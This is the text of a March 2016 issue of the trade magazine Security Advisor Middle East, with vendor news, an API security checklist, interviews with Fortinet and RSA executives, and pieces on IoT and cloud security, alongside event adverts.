Security Advisor Middle East | Issue 3

the art of defence

Fortinet’s Chief Security Strategist on how to guard enterprise networks

Checklist for API security

Armed for the IoT revolution

Raising the cloud game

Issue 3 | March 2016

www.securityadvisorme.com

founder, CPI MedIA GrouPDominic De Sousa (1959-2015)

Group CeoNadeem Hood

Publishing directorRajashree Rammohan

[email protected] +971 4 375 5685

edItorIAl

Group editorJeevan Thankappan


editorAnnie Bricker


deputy editorJames Dartnell


online editorAdelle Geronimo

[email protected]+971 4 375 5683

AdVertISInG

Commercial directorChris Stevenson


Group Sales directorKausar Syed


Sales ManagerMerle Carrasco


CIrCulAtIon

Circulation ManagerRajeesh M


ProduCtIon And deSIGn

Production ManagerJames P Tharian


designersAnalou Balbero


Neha [email protected]

+971 4 3751644

dIGItAl SerVICeS

Web developerJefferson de Joya

Abbas Madh

Photographer Charls Thomas


Published by

Registered at IMPZPO Box 13700

Dubai, UAE

Tel: +971 4 440 9100Fax: +971 4 447 2409

Printed byAl Ghurair Printing & Publishing

regional partner of

© Copyright 2016 CPIAll rights reserved

While the publishers have made every effort to ensure the accuracy of all information

in this magazine, they will not be held responsible for any errors therein.

CONTENTS

06 ChECkliSTfOrapiSECuriTy

Security Advisor ME delves into how users can plug API leaks and secure apps.

16 STraTEgyfOrSECuriTy

RSA Security’s Robert Griffin discusses the current threat landscape and how organisations can strengthen their security postures.

20 raiSiNgThEClOudgamE

As cloud becomes a major part of the IT strategy, businesses should look into bolstering their cloud security measures.

10ThEarTOfdEfENCEAn exclusive interview with Tyson Macaulay, Chief Security Strategist and Vice President of Security Services, Fortinet, on the challenges faced by the cybersecurity market today.

26 OffENSivESECuriTy

Attivo Networks’ Carolyn Crandall gives insights on how security teams can gain the upper hand by going on the offense.

32 ThEriSEOfThECdO

Data is one of the most essential assets of any business. Is it time for the C-suite to make room for a Chief Data Officer?

36 iNduSTry4.0

MasterCard’s Ajay Bhalla discusses what enterprises can expect in the impending fourth industrial revolution.

STRATEGIC PARTNER

NEwS

DarkMatter has announced its entry into the secure communications market with the introduction of its voice and chat applications for iOS and Android.

The apps, according to the company, provides end-to-end secure communications, based on the latest advancements in cryptography, cryptographic implementations and network protocols. It is based on a software and hardware security co-design and incorporates an advanced hardware-based cryptographic chip to ensure security and prevent tampering.

DarkMatter also highlighted that the initial use case of the voice and chat application was developed to meet the high security requirements of government agencies in the region.

Dr. Najwa Aaraj, Vice-President, Special Projects, DarkMatter, said, “We are building security capacity within the

gEmAlTO TO dElIvER JORdAN’S

eId PROgRAmmE

dARkmATTER lAuNChES SECuRE vOICE ANd ChAT APPlICATIONS

Gemalto has been selected by Jordan’s Ministry of Information, Communication and Technology (MoICT) ftthe country’s new citizen ID programme.

The digital security company, will supply the Ministry of Interior (MOI) – through OFFTEC – with its Sealys polycarbonate contactless eID cards along with a suite of Coesys enrollment, card personalisation and issuance solutions. Gemalto will deliver the eID cards as well as automatic fingerprint identification systems (AFIS) to reinforce national security, strengthen immigration controls and minimise the risk of fraud in the next elections of August 2016.

The enrollment system will be deployed in 100 civil status and passport offices, enabling MOI staff to capture the personal and biometric data of citizens for duplication-free entry onto the National Registry.

“For the Kingdom of Jordan, improving security, slashing ID fraud and creating a trusted infrastructure for online access are all high priorities on the agenda,” said Majd Shweikeh, Minister of Information, Communication and Technology. “The new Jordan eID card will strengthen the infrastructure required for digital signature and will enable the addition of new eGovernment Services onto the card when they are available.”

region, and the secure voice and chat application is a proposition that provides additional security to government agencies and businesses requiring such products. Utilising the latest advances in cryptography and security protocols, and tapping into the tier-one talent present at DarkMatter, we believe we are well-positioned to provide highly secure solutions demanded by discerning customers across the region.”

Bit 9 + carbon Black rebrands to carbon Black

Bit9 + Carbon Black has announced its official re-branding to Carbon Black. According to the company, while the name has changed, no changes will be made to its strategy, product portfolio, technology direction and investments, and commitment to its 2,000 worldwide customers and hundreds of partners.

“Two years ago when Bit9 merged with Carbon Black, we combined

our names to send a message to the market,” said Patrick Morley, CEO, Carbon Black. “We wanted to emphasise that Bit9, well known for its superior endpoint threat prevention, was joining with an emerging leader in endpoint threat detection and response. The combined name was always meant to be temporary until we achieved leadership in the field of next-generation endpoint security. Having reached that goal it’s time to simplify our brand.”

The company also changed names of its products to reflect the Carbon Black brand – the Bit9 Security Platform is now Carbon Black Enterprise Protection; the Carbon Black product is now Carbon Black Enterprise Response; and the Threat Intelligence Cloud is now Carbon Black Threat Intel.

23% of global SMBs are improving

their security approach through outsourcing their

cybersecurity functionsSource: Cisco

Dr. Najwa Aaraj, DarkMatter

Patrick Morley, Carbon Black

4 03.2016 www.securityadvisorme.com

NEwS

Palo Alto Networks and Honeywell Process Solutions (HPS) have entered a strategic collaboration deal to boost the cybersecurity capabilities of control systems used by industrial facilities and critical infrastructure.

Honeywell’s industrial cybersecurity business is now offering the Palo Alto Networks next-generation security platform to industrial customers. The collaboration, according to both companies, enables customers to better prevent cyberattacks against their Process Control Networks (PCN) and Operational Technology (OT) environments in order to protect their assets and maximise production uptime and safety.

The joint solution offers process network traffic monitoring and advanced threat prevention across the automation environment. “Connecting vital infrastructure to the Industrial Internet of Things (IIoT) comes with tremendous benefit, but also associated cyber risks.

kASPERSky lAb bESTS TOP3 mETRIC

fOR INTERNET SECuRITy

PAlO AlTO NETwORkS, hONEywEll PARTNER fOR INduSTRIAl CybERSECuRITy

Kaspersky Lab has announced that for the third year in a row, it has achieved the top spot in the TOP3 metric for Internet security.

The annual TOP3 rating, assesses the performance of over 100 vendors that took part in a variety of IT security tests for corporate, consumer and mobile products during the course of the year. Tests performed in these programmes assess all protection technologies against known, unknown and advanced threats.

Nikita Shvetsov, Chief Technology Officer, Kaspersky Lab, said, “Our extensive security intelligence, built up over more than a decade, powers our approach to developing endpoint protection. Coupled with our in-house technology expertise, we not only deliver multi-layered security to deal with today’s threats, but develop next generation technologies to deal with the threat landscape of tomorrow, providing the most comprehensive protection available. Securing the TOP3 top spot once again is testament to our approach and the capabilities of our product set which, time and time again, demonstrates the robust and reliable protection that we provide for consumers, SMEs and enterprise customers alike.”

Our work with Honeywell addresses the cyber risk with next-generation security designed to meet the needs of industrial customers and provide them with threat detection and prevention capabilities previously unseen in the industry,” said Chad Kinzelberg, Senior Vice President, Business and Corporate Development, Palo Alto Networks.

Qualys appoints new cMO

Qualys has appointed Shail Khiyara as its new Chief Marketing Officer.

Khiyara, according to the company, will lead all elements of the Qualys’ worldwide marketing strategies, including branding, end-to-end marketing functions, product marketing, corporate communications, demand generation and other go-to-market initiatives. He is joining Qualys’

executive team to further advance the company’s vision of helping 8,800 customers in over 100 countries secure their IT infrastructures, providing a continuous view of each customer’s security and compliance landscape.

“Rapidly evolving advanced cyber threats require a radical transformation in the security market, to meet customer needs and to protect organisations. Qualys is leading this transformation with 100 percent SaaS based solutions that reach well beyond vulnerability management,” said Shail Khiyara, CMO, Qualys. “With over two billion annual scans, 50+ Global F100 brands and over 8,800 customers, Qualys is the life-blood of many organisations. I am excited to join the team and am looking forward to accelerating our growth and awareness of the Qualys Cloud Solutions.”

$1.9B – expected cost of cybersecurity

spending in the global oil and gas industry

by 2018Source: Bloomberg

Chad Kinzelberg, Palo Alto Networks

Shail Khiyara, Qualys

03.2016 5www.securityadvisorme.com

ChECklIST fOR API SECuRITy

Top ways to plug the leaks and secure your apps

fEATuRE


Zikar Ajram, Head of Technology, CA MENA, adds: “APIs are an emerging technology for integrating applications using Web technology. This approach is exploding in popularity because it builds on well-understood techniques and leverages on existing infrastructure. But, it is a mistake to think we can secure APIs using the same methods and technology that we used to secure the conventional, browser-centric Web.

“While its true that APIs share many of the same threats that plague the Web, they are fundamentally different and have an entirely unique risk profile that you need to manage.”

There are more than 13,700 publicly available APIs offered by firms today, according to programmableweb.com. Salesforce.com generates 50 percent of its revenue through APIs, Expedia.com generates 90 percent, and eBay attributes 60 percent of revenues to APIs.

“The broader attention to APIs gives hackers a new and more interesting playground to [pursue],” Heffner says.

Most APIs are available to anyone on the Internet because they run on web servers. Just like websites, APIs can be crawled by search engine bots and hackers.

API security is an area that deserves specific enterprise scrutiny, Heffner adds. “We don’t want any submarine APIs – running silent, running deep

-- because if someday hacks your home site you see it pretty quickly. If somebody hacks an API you may not see it at all.”

Harish Chib.VP of MEA,Sophos, says there are obvious reasons why API security warrants special attention from CISOs. “The use of APIs has so far been more prevalent on the web. Following smartphone / device proliferation and advent of cloud, anywhere, any device and any time connectivity has become a reality. Businesses across verticals are going digital and want to embrace collaborative methods to remain customer-focused and agile in their IT infrastructure. APIs will continue to remain a critical conduit to share and exchange information on the Internet. The business opportunities APIs can be offset by unaddressed security weaknesses or vulnerabilities. Therefore, it is important for both API providers and API consumers to ensure secure API implementation so that hackers can’t use them to attack an enterprise or harvest personal or financial data of users.”

Why are security flaws popping up in APIs?

For starters, developers are not security pros, and speed to market affects any kind of testing and due diligence that coders can do around their code. “They spend a lot more time bringing value in the apps than on the security side,” which can lead to security leaks, says Allyn Fay, technical marketing manager at identity and access management vendor Ping Identity.

There is also very little communication between API developers, which discourages security standards.

“In every company, each business unit has the mandate to publish APIs, and they don’t talk to each other,” says Subra Kumaraswamy, head of product security for API platform developer Apigee. “If I’m a business unit that’s

fEATuRE

m any Starbucks customers got a jolt in May when cyberthieves were

discovered stealing money from their credit cards and payment accounts by first tapping into their Starbucks mobile apps. The culprit was believed to be a hole in an application-programming interface (API), though perhaps not on Starbucks’ site but on another app where overused passwords were stolen and reused, according to reports.

Greeting card website Moonpig and mobile app Snapchat have suffered similar fates at the hands of API, the set of requirements that govern how one application can talk to another and what data it can access.

In January, an unsecured API caused Moonpig to expose personal records and partial credit card details for some 3 million customers. Two exploits in Snapchat’s API allowed hackers to mass-match phone numbers with names and to create millions of bogus accounts.

Why are APIs becoming the target of hackers? Because they’re everywhere, says Randy Heffner, API security analyst at Forrester Research. Just about every company is building APIs to support their web or mobile application because it allows them to innovate faster and bring outside content in.

“APIs are an emerging technology for integrating applications using web technology. This approach is exploding in popularity because it builds on well-understood techniques and leverages on

existing infrastructure.” - Zikar Ajram, Head of Technology, CA MENA


all the information they have on a user and give it to the API because they don’t know what data is required, Fay says. “Make sure you’re only moving the data that you need to,” he says. “It’s more of a privacy issue than a security one,” but it could be used in social engineering schemes.

Documenting the requirements for securing APIs can also be of great help, according to Chib from Sophos. This practice can make it easier to ensure ensuing code changes continue to meet data-handling policy requirements for personal or sensitive information. Moreover, documenting what information should be logged to capture who, what and when APIs are accessed for audit purposes can also prove effective in promoting API security awareness, he adds.

CA Technologies has recently launched an awareness programme called “API360: The complete API strategy model for the enterprise.” This guidance programme promotes awareness and useful information on how to tackle API rollout and adoption. “This guide allows you to understand how to go about creating and managing an API program while navigating the challenges of exposing your intellectual property outside the enterprise,” says Ajram.

doing shipping, or a payment company doing payment APIs,” we’re not comparing notes, he adds.

What’s more, developers are under pressure to innovate faster, which can also create vulnerabilities in the process, Kumaraswamy says. “You have an opportunity to make mistakes in exposing data inadvertently, or you’re not putting the right controls in the API.”

Plugging the leaksApp development shows no signs of slowing down, but companies can take steps to plug the leaks in APIs.

Authorise the user and authenticate the app: When it comes to securing applications versus APIs, “in Web apps you typically only have to authenticate the end user. In the API world you also have to authenticate the app,” Kumaraswamy says. For instance, “If you’re using the AirBnB or the Uber app, these apps are calling their APIs so those apps are being authenticated.”In the case of Moonpig – authentication was enforced, but authorisation was not, he adds.

Using a standardised protocol that exists for both authentication and authorisation are the jumpstart to using APIs securely, Fay adds. “If you do them the right way, the amount of security built in is based on the standard” and won’t vary from app to app.

Encrypt transports: Always encrypt sensitive data, Heffner says. Never create a security hole by using plain text transfers. Developers should use SSL certificates on web APIs that transfer sensitive data between the end-point program and the web service interface because hackers can sniff this data. If you make your API a subdirectory in your current web application, you can use the same security certificate that you have for your website.

Protect credentials : Know how credentials are managed for the app and how critical they are for the particular kind of business scenario, Heffner adds.

“If I were a bank doing financial transactions with a partner, there’s a number of layered connections I would want to have, like a VPN to SSL or I would have digitally signed tokens – SAML or the like, as part of the full security scheme.” With multiple security mechanisms in place, “it’s raising the bar on the number and kind of things someone would have to do to spoof any connection.”

Digitally signed tokens can also be one part of the security scheme. Tokens are character strings that uniquely identify a user. You can store these strings in a database and only give access if the user enters the correct user name and password. The token is then used by the API user to access an API’s methods.

Avoid static or embedded passwords: When logic is built into an app, it’s very difficult to change, Fay says. When you want to change a policy or update security, having all of that logic built into mobile apps is not a good thing. So developers sometimes take shortcuts with easy passwords or by caching IDs and passwords locally on a mobile app, and that’s a huge problem from a security standpoint. “Static passwords are to be avoided,” Fay says.

Expose only required information to your API : Developers will often take

fEATuRE

“The business opportunities APIs can be offset by unaddressed security weaknesses or vulnerabilities. Therefore, it is important for both API providers and API consumers to ensure

secure API implementation so that hackers can’t use them to attack an enterprise or harvest personal or financial data of users.” - Harish Chib.VP of MEA,Sophos


ORGANISED BY CYBER SECURITY INNOVATION PARTNER

SMART CITY PARTNER

GISEC STRATEGIC PARTNER

BIG DATA HACKATHON &BUSINESS INTELLIGENCE ANALYTICS PARTNER

IOTX KEYNOTE SPONSOR

TECHNOLOGY MEDIA PARTNER

DIGITAL PARTNER OFFICIAL LIVE CHAT PROVIDER

OFFICIAL PUBLISHERANALYTICS PARTNER

future technology week

Hackathon | Market Labs Capture the Flag | The Hive

Interactive Arena4 live events showcasing the technology innovations that are reshaping our world.

future technology week.

29-31march 2016

Four live shows:

Free to attend:

GET YOUR FREE VISITOR PASS TODAY. www.futuretechweek.com/visit

FTW 2016_AD_207x270.indd 1 2/28/16 3:55 PM

w

Tyson Macaulay is the Chief Security Strategist and Vice President of Security Services at Fortinet. This role involves international business strategy and thought leadership for the company, and developing Consulting Services capacity. We caught up with him during his recent visit to Dubai to talk about a range of security issues surrounding the IT landscape.

ThE ART Of dEfENCE

COvER fEATuRE


w e read about breaches everyday. Should enterprises now plan to fail and

try to limit the damage because we can’t keep the bad guys at bay?When you are dealing with risks you have to make certain assumptions about the impact and you should plan to win, never fail. So in the case of vulnerabilities and threats faced by enterprises, they should plan to mitigate the damage; they need to assume that at some point a vulnerability could be exploited and they should be prepared to respond to that in a timely manner.

do you think we need to move beyond network perimeter-based defence?Yes, perimeter is disappearing quickly, especially with more and more devices getting connected in IOT, more applications are being moved to the cloud and even the network itself is becoming a virtualised infrastructure asset. I see security being distributed across multiple points in the infrastructure– firewalls in data centre, gateways, all the way down to the endpoints. Security has to be distributed, there is no other way. However, the challenge is to manage the security tools that will be distributed across the infrastructure.

Security is increasingly becoming complex and more difficult to manage. how do you help your customers address this?Fortinet has end-to-end security capabilities, right from high-end data

centres, carrier-grade networks, all the way down to small remote gateways for branch offices or even homes. No other vendor has this range of functionality. When you couple that with key products being virtualised and managed through a single interface, our customers are able to reduce complexity significantly.

given the fact that most enterprises have many point solutions for security, is single pane of glass management even possible?Our guidance is that you should have two to three security vendors in your infrastructure. In large enterprises it’s common to see seven panes, or in some cases, even 20 panes of glass. You need a vendor that offers end-to-end functionality and can unify the reporting. Having said that, if you are a global enterprise you will never want to get down to just one single vendor. It will be disingenuous on my part to pretend that it is a good piece of advice.

do you we need to radically rethink our approach to security?The biggest challenge when it comes to security is skills. As a society, we need to radically rethink how we educate and train young people. Fortinet engages with educational institutions to try and give these young minds more opportunities to learn. I participate in the development of engineering standards for young people, and that’s where it really has to start. I do not think there is a silver bullet to security from a technology perspective.

You can see an emerging interest in massive statistical analysis on patterns in

networks, operating systems and the likes but that is only a part of the solution. In the end, there are probably many components available that are not integrated and managed, and that’s what we need to overcome first. It all starts with skills and inside Fortinet we have an excellent training programme for our partners and users. It gives them great insights into not only product functionalities but security in general as well.

Is security really a boardroom issue now?Not only do I see it becoming a boardroom issue, there is a bill in front of US senate now which mandates that boards of any public listed entity should have someone with a functional knowledge on cybersecurity. I see it becoming more of a matter of compliance and it makes perfect sense because every enterprise now is information-driven and there are so many ways to use that information against the owner, customers and partners.

Are we going to see any type of threats this year?We have recently released our 2016 threats prediction report. We are going to see more machine to machine type of attacks and new forms of worms coming to take advantage of mobile platform. In the early 90s, we have seen worms that took advantage of Unix, then Windows and now you will see worms on platforms such as Android.

we are talking about a multi-layered defence to combat threats. will this affect network performance and increase complexity?IT overall is becoming more complex because of virtualisation, which introduces lot of operational efficiencies but at the same time leads to complexity. Now, virtualisation is moving out of the data cente, right into the edge of the network and now we are talking about virtualised routers and base stations. That is going to require more security and mean more complexity. One way to combat this complexity is through automation and single control points with end-to-end solutions.

COvER fEATuRE

The biggest challenge when it comes to security is skills. As a society, we need to radically rethink how we educate and train young people.


T

TOP 10 things cybersecurity professionals need to know about the Internet of Things

by Adam Philpott, Director, EMEAR Cybersecurity, Cisco

OPINION

he Internet of Things (IoT) is accelerating and creating significant

opportunities for organisations, individuals, communities, and countries as more things come online – along with the people, processes, and data that interact with them. It has been predicted that there will be 500 billion devices connected by 2030 which not just includes the connection of physical objects alone but also people and processes. This presents new challenges, particularly when it comes to cybersecurity.

In order to capitalise on the estimated trillions of dollars of value to be gained globally over the next decade, these connections not only require networks but more importantly ‘secured’ network connections.

To help cybersecurity professionals cut through the hype and gain a better understanding of what to expect as the

IoT continues to evolve, these top 10 observations might help:

1

Worlds will collide. Most organisations have a wide range of disparate technologies and processes

to protect their information technology (IT) and operational technology (OT) networks, as well as their physical spaces. Add to that consumer technology (CT) such as smartphones and tablets on IT networks and it’s easy to see that these networks combine to become IoT networks. We need to begin to implement cybersecurity solutions to protect all networks equally from attack while recognising their specific requirements and priorities.

2

The attack surface will expand. With billions of new devices now connected to the IoT (including smart meters,

heating and air conditioning systems, health monitoring devices, remote sensors for gas and oil lines and so on) and more devices connecting all the time, the ability to gain visibility into these attack vectors, let alone close them to malicious actors, is increasingly difficult.

3

Threat diversity will increase. Due to the variety of objects adversaries can target, many of which are in insecure

locations, attackers are able to devise new methods the cybersecurity industry has yet to face and blend sophisticated techniques to accomplish their mission.

4

Threat sophistication will continue. Threats have already become stealthier, evading initial point-in-time

detections and using nearly imperceptible indicators of compromise to reach their target. Cybersecurity systems that rely exclusively on


Register your team today to transform your organisation from smart to secureGive your security strategy this year’s most crucial upgrade with insights from an international speaker

line-up and a world-leading conference agenda

Part of

29 - 31 MARCH 2016Dubai World Trade Centre

Security Innovation for a Connected Future

SEATS ARE LIMITED, SECURE YOURS TODAY! www.gisec.ae/visit [email protected] +971.4.308.6481

John BumgarnerOne the world’s foremost authorities

on Anti Malware

Rt Hon Dr Liam Fox The former UK Secretary of State for Defence

who rolled out Cyber Security departments for the armed forces and Ministry of Defence

Tudor Enache A leading Penetration Test expert

in the UAE

SECURITY MASTERMINDS HEADLINE GISEC

Diamond Sponsor

Platinum Sponsor

GoldSponsors

Organised By Strategic Sponsor

Cyber Security Innovation Partner

Mark HughesPresident, BT Security Enterprise,

BT Global ServicesAccountable for all elements of BT’s enterprise security

activity globally, including their media arm, BT Sport.

Engineer Ammar AlmarzooqiCISO, Abu Dhabi DepartmentOf Economic

DevelopmentResponsible for providing Identity access management

for a significant government department

Amr Gaber CISO, Dubai Media

Providing outstanding incident response for Dubai government’s media channels

Education Partner

OfficialMedia Partners

Silver Sponsor OfficialPublication

Digital Partner TechnologyMedia Partner

GISEC Ad 207x270.indd 1 2/28/16 3:38 PM

point-in-time defenses and techniques can’t keep up with unfolding attacks.

5

Remediation will become more urgent and more complex. When an attack does happen organisations

can’t necessarily isolate a system because the cost and implications of shutting it down may be greater than the cost of an infection, presenting serious tradeoffs between protection and continuity of operations. Remediation methods will need to support a focused approach to quickly detecting, scoping, and containing a threat, cleaning up systems, and bringing operations back to normal.

6

Risk and impact will escalate. Sensitive data and personal information is flowing between process and

business domains – from and through billions of connected devices, in secure and insecure locations throughout the world. The vast majority of these devices and domains rest outside the secure embrace of the IT and OT networks. In an OT world, the impact of a breach can be much greater. For instance, if a hospital or medical care facility is attacked and systems needed for patient care or life support are impacted, the outcome is more severe than a computer system infected with malware in an IT environment. The ability to protect this data wherever it goes and however it is used must be addressed.

7

Compliance and regulations will mount. Regulatory bodies are requiring tighter security and privacy controls

than ever before, which is affecting a growing number of industries. If unable to effectively and efficiently meet these requirements, an organisation’s ability to gain value as an active participant in the IoE will be

limited dramatically. In addition, as more devices are connected, lines of ownership and responsibility will become increasingly blurred. This introduces new challenges for managing and maintaining compliance with regulatory requirements.

8

Visibility will be paramount. Cybersecurity professionals need to see a real-time, accurate picture of devices,

data, and the relationships between them, in order to make sense of billions of devices, applications, and their associated information. This requires more automation and faster analytics; humans won’t be able to scale with the environment.

9

Threat awareness will become the focus. In this amorphous perimeter, cybersecurity professionals

need to presume compromise and hone the ability to identify threats based on understanding normal and abnormal behaviour, identify indicators of compromise, make decisions, and respond rapidly. This requires overcoming complexity and fragmentation in technology environments.

10

Action will need to be swift. Upon identifying a threat or anomalous behaviour, cybersecurity professionals

need to be able to take action. This requires the right technologies, processes, and people working together and swiftly to be effective.

The IoT doesn’t replace the existing IT or OT networks; rather, it supplements these networks and relies on them in many ways. We need to build on these existing networks and existing network security but also bring a new perspective, recognising that since every aspect of the network is now working together, our

cybersecurity and physical security solutions must also work together with a coordinated focus on threats.

What’s needed is a new, threat-centric security model that is as pervasive as the IoT and the threats themselves. This threat-centric security model must span a range of attack vectors and address the full attack continuum – before, during, and after an attack. With this model we can protect computer systems, networks, and data. And for many enterprises involved in industrial control and automation activities, we need to extend this same model to better protect operational systems that are the lifeblood of the enterprise and in many instances, our daily lives.

Regulatory bodies are requiring tighter security and privacy controls than ever before, which is affecting a growing number of industries. If unable to effectively and efficiently meet these requirements, an organisation’s ability to gain value as an active participant in the IoE will be limited dramatically.

OPINION


Powering smart and connected enterprises, government and consumers

Book to make connections that matter Iotx.ae/book [email protected] +971 4308 6805

Internet of things expo29-31 march 2016dubai world trade centre

ioTx.ae/book

BookNow

Internet of Things Expo@IoTDubai facebook.com/iotdxb

Organised by Diamond SponsorKeynote Sponsor Gold Sponsors

Arabic Broadcast Partner

OfficialPublication

Digital PartnerOfficial Media Partners

Silver Sponsors

Official English Radio

Official Business Publication

Platinum Sponsors

BOOK NOW for unparalelled Knowledge and Networking

Premium Conference Interactive Demo ArenaThe Hive-Startup Pitch in

collaboration with Dubai SMEIoT Hackathon

hosted by Microsoft

Be inspired by global innovators and visionaries at the regions pioneer IoT event

KARINE DONGIN-SAUZEDeputy MayorGreater Lyon

Smart City Future

DR JANUSZ BRYZSEKFounder

Exo SystemsThe Father of Sensors

JONNY VOONIoT Lead

Innovate UKIdentifying frontier tech

JAMIE CUDDENHead of Smart Cities Programs

City of DublinSustainability through smart

environment

DR AZEZ MOHAMMEDPresident & CEO Power Generation

Services Middle East and AfricaGE Power & Water

IoT applications changing the future

A part of

Official LiveChat Provider

TechnologyMedia Partner

IOTX AD 207x270 .indd 1 2/28/16 3:51 PM

w

STRATEgy fOR SECuRITy

At RSA Conference 2016, we caught up with Robert Griffin, Chief Security Architect, Security Evangelist, RSA, to learn

more on the current threat landscape and insights into how organisations can strengthen their security posture.

INTERvIEw

hat are the biggest security threats organisations should be wary of

in 2016?There are merchant threats, especially in terms of disruptions of enterprises and infrastructures. These are new and important. For example, the recent attack against Ukrainian power companies in December resulted in the disruption of electric power. For many attackers, this represents a shift in focus from financial espionage into active disruption of business within the organisation and also the society where these capabilities are offered.

Today we see that there is a tendency to attack new classes of enterprises, which have been relatively not as attractive to attackers, until now. Critical infrastructure is now being targeted more often than compared to two years ago.

Robert Griffin, Chief Security Architect, Security Evangelist, RSA


INTERvIEw

Are there more threats when it comes to information security?There seems to be less risk of information breaches as opposed to infrastructures itself being targeted. This was true in the Saudi Aramco breach as well as the Ukrainian incident.

Back in 2006, it was clearly espionage attacks against the manufacturing sector. However, today it is a different class of attacks intended to achieve social and economic damage.

There is a reflection of change in the goal of the attackers to create a social impact rather than for financial advantage.

what are the cybersecurity trends that you see around the globe?There are new trends in attack mechanisms, especially in terms of the growth of the dark net. For example, RSA announced the discovery of two fairly significant new sets of malware in late 2014. One was called Terracotta, which was a malware-supported VPN network. Attackers could rent and have access to this VPN in order to secure communications among themselves.

The second one was called GlassRAT, a new remote access Trojan, explicitly directed towards being able to gain control of enterprise environments. Both were clearly a new generation of malware with some resemblances to previous classes of malware.

There are definitely on-going developments of new malware within the attacker environment. The other change is in the direction and goal of the attackers.

what do you think is the future of cybersecurity?Well, the first point to note is that attacks will continue to grow in complexity, in frequency and in the range of attackers. Presently, we have three most common categories of attackers – nation-state, cybercriminals and hacktivists. Most likely, there will be further

differentiation of these categories and the introduction of potential new kinds of attackers.

We are most certain to see a shift in the direction of response. At RSA, we have strongly advocated that the model of defensive and preventive strategies such as firewalls will no longer suit the modern enterprise or government.

Today’s employees are always on the move, so most of their communication doesn’t happen within the home office over secured networks but via the cloud. Therefore, we need to have models that fit the cloud-based approach and support mobile users. The only way to do this is through mechanisms such as identity and analytic-based approaches. I believe that the strategy of analytics and investigation will be the dominant

response model in terms of how we deal with achieving cybersecurity going forward.

how can businesses enhance their security posture?The first aspect to this is to have a fundamental change in attitude and perspective. We have to think of security as a spectrum of capabilities. Organisations should start by identifying what are the assets, if attacked or breached, would damage the company or its customers the most. What can be done to mitigate the risks around that impact? If we begin there, we will quickly come to the conclusion that very little should be spent on anti-virus or things that provide such little protection against attacks. Instead the most effective methods show up in areas such as identity management, analytics and risk management. That is the strategy one has to have in place and is the best way forward in order to respond to threats.

gaining complete visibility across networks is what most organisations are aspiring towards. but what are the key elements to keep in mind to help achieve this?There are three main aspects. One is that, the more you can instrument capabilities in that environment to provide information, the better off you are. If you don’t have that, then you miss out on a whole body of information, which you could otherwise use.

The second aspect is that you need to gather kinds of information that may not be the direct indicators themselves but provides really good context about what is going on.

The third element is that organisations really need to think about the privacy questions. They need to assess if this kind of information is collected, does it pose a risk of exposure of important user information or risks in terms of national regulation and company liabilities.

Today’s employees are always on the move, so most of their communication doesn’t happen within the home office over secured networks but via the cloud.


C

ARmEd fOR ThE IOT REvOluTION

Jack Waters, CTO, Level 3 Communications, discusses three network adjustments organisations should undertake for a smooth and secure transition towards a hyper-connected future.

INSIghT

Jack Waters, CTO, Level 3 Communications

isco estimates that over 50 billion devices and objects will be connected

to the Internet by 2020. However, a problem remains, as many traditional networks are still manual, static and complex, which isn’t ideal for the Internet of Things (IoT). To realise the promise of a hyper-connected future, three shifts must take place.

fibre. The bandwidth needed for the onslaught of IoT-connected devices should be enough to make anyone think about the fibre. At the Consumer Electronics Show held recently, a lot of discussions focused on this because of the emergence of 4K ultra-high-definition television.

The underlying conversation around 4K and 100Gbps has to do with fibre-optic networks. Getting cities – and consumers – hardwired with fibre will be a necessity for the future. The term Smart City has been used to characterise these communities that are investing in infrastructure and advancing science and technology efforts to securely collect and use data to do everything from decrease energy consumption to cut overhead costs and improve the life of residents.

IPv6. Right now, we aren’t actually seeing an overwhelming adoption of IoT devices in personal homes or offices. Cisco stated that more than 99 percent of things in the physical world


remain unconnected. However, it’s only a matter of time before every single aspect of our life is Internet dependent.

In today’s environment, if consumers want their devices to be accessed outside of their homes or private networks, a user has to go into their Wi-Fi router and portmap it to an outside network. This is complicated and not very user-friendly.

To fix this, we must give public IP space to all of the ‘things.’ Great in theory, however, the rate of new ‘things’ is growing at such a rapid pace, the current method of assigning addresses won’t be able to accommodate the volume. In order to provide addresses for every device, the Internet will need to transition from IPv4 to IPv6.

So what’s the hold up? At the moment, there isn’t imminent financial motivation or competitive pressures for broadband providers to transition. As long as the market can efficiently work out the remaining sellable IPv4 address space to those that require it, the pressure to migrate to IPv6 will not fully materialise.

Over time, as the number of IoT devices increases and IPv4 addresses grow scarcer, financial and competitive pressures will rise accordingly, eventually leading to economic incentive for IPv6 transition. Consumers will demand the ability to interwork with every device seamlessly with speed, ease and expect that the ‘Internet’ will continue to be the ubiquitous, any-to-any network they grew accustomed to in its IPv4 origins. An IPv4 and IPv6 Internet, patched together with transitional technologies such as Network Address Translation, won’t be able to scale to the levels forecasted for IoT devices, not without cumbersome constraints. This perfect storm of consumer expectations and financial incentive is what is required for IPv6 to become a reality after all of these years.

Security. There is a lot of concern about what it will mean for the threat ecosystem to have millions of connected devices – especially those managed by consumers – available for malicious activity. If we don’t address the security issues rearing up today, we’re going to have a serious security situation. Right now, many companies are making Internet-connected devices that aren’t able to be patched or easily updated with new security rollouts. Considering many IoT devices collect personal data, security should be a concern for all.

IoT developers should do more to secure their products. For organisations using IoT, it is essential to do a rigorous analysis of the security controls built into IoT devices and services they wish to use. At a minimum, an audit of IoT device’s communications channel, use of encryption, an analysis of the type of data it collects, stores and transmits, and the security of the end-point(s) with which it communicates, is paramount.

Given IoT’s growth rate, and the resulting broadening of the cyber-attack surface, organisations must be ever more vigilant in conducting comprehensive risk analyses and in the implementation of proper governance structures. A risk-based approach is the best way to balance the risk of using IoT with its unlimited productivity benefits.

INSIghT

Cisco stated that more than 99 percent of things in the physical world remain unconnected. however, it’s only a matter of time before every single aspect of our life is Internet dependent.

Protects Against Dynamic Security Threats

Simplifies IT Security Structure

Provides Security for Email, Web and Database Systems


ore and more businesses are currently using the cloud, but by 2020

that number is expected to grow even more. With all the technologies being developed today to secure the cloud, it doesn’t always guarantee immunity from data breaches.

Now that the cloud is rapidly becoming a mainstream part of IT, businesses must think more critically about how to bolster their security

m

RAISINg ThE ClOud gAmE

With cloud technologies increasingly becoming a major part of an enterprise’s digital strategy, IT decision-makers should devise ways to enhance

their cloud security measures.

INSIghT

beyond cloud providers’ default security infrastructure.

Conventional cloud providers make a good effort to offer robust security measures. They generally come equipped with server-side encryption, user controls, data restoration abilities, and device wiping capabilities meant to protect your files in the cloud. Still, despite these measures, there’s a major – but little discussed – gap in cloud security, and it has to do with that other major mobile work trend, BYOD.

